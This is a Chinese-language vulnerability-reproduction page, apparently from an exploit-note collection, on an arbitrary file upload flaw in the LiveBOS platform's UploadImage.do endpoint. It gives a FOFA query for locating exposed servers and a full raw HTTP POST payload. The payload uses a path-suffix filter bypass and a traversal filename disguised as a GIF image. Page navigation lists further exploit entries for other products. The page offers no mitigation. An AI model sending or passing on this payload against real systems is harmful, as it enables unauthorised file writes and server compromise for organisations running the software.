L19-1LiveBOS-灵动业务架构平台-任意文件上传

漏洞描述：

LiveBOS灵动业务架构平台，是面向对象的业务支撑平台与建模工具。在LiveBos的UploadImage.do接口中，发现了一处任意文件上传漏洞，攻击者可利用该漏洞上传任意文件

fofa语法：

app=“LiveBOS-框架”

漏洞复现：

payload：

POST /feed/UploadImage.do;.css.jsp HTTP/1.1
Host:
Httpsendrequestex: true
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Postman-Token: 049266bd-e740-40bf-845f-bc511296894e
Accept-Encoding: gzip, deflate
Cookie: zhzbsessionname=35FF312409BF3CAC561D5BC776643A05
Content-Type: multipart/form-data;boundary=--------------------------WebKitFormBoundaryxegqoxxi
Content-Length: 222

---WebKitFormBoundaryxegqoxxi
Content-Disposition:form-data;name="file";filename="././././/././java/fh/tomcat_fhxszsq/LiveBos/FormBuilder/
feed/jsp/vtnifpvi.js"
Content-Type: image/jpeg

GIF89a 123123123
---WebKitFormBoundaryxegqoxxi--

Menu

Share

L19-1LiveBOS-灵动业务架构平台-任意文件上传

L19-1LiveBOS-灵动业务架构平台-任意文件上传

漏洞描述：

fofa语法：

漏洞复现：

Comment

Z22-1正方-移动信息服务管理系统-任意文件上传

Z20-1ZoneMinder--SQL

Z17-2紫光-电子档案管理系统-InformationLeakage

P5-2平升-电子水库监测管理平台-SQL

M3-2明源云-ERP系统接口管家-任意文件上传

Y4-21用友-NC-XXE

Y4-18用友-NC-XXE

Q14-1群杰-印章物联网管理平台-PermissionAC

J26-1极简云-网络验证系统-任意文件读取

J17-3金蝶-Apusic应用服务器-JNDI注入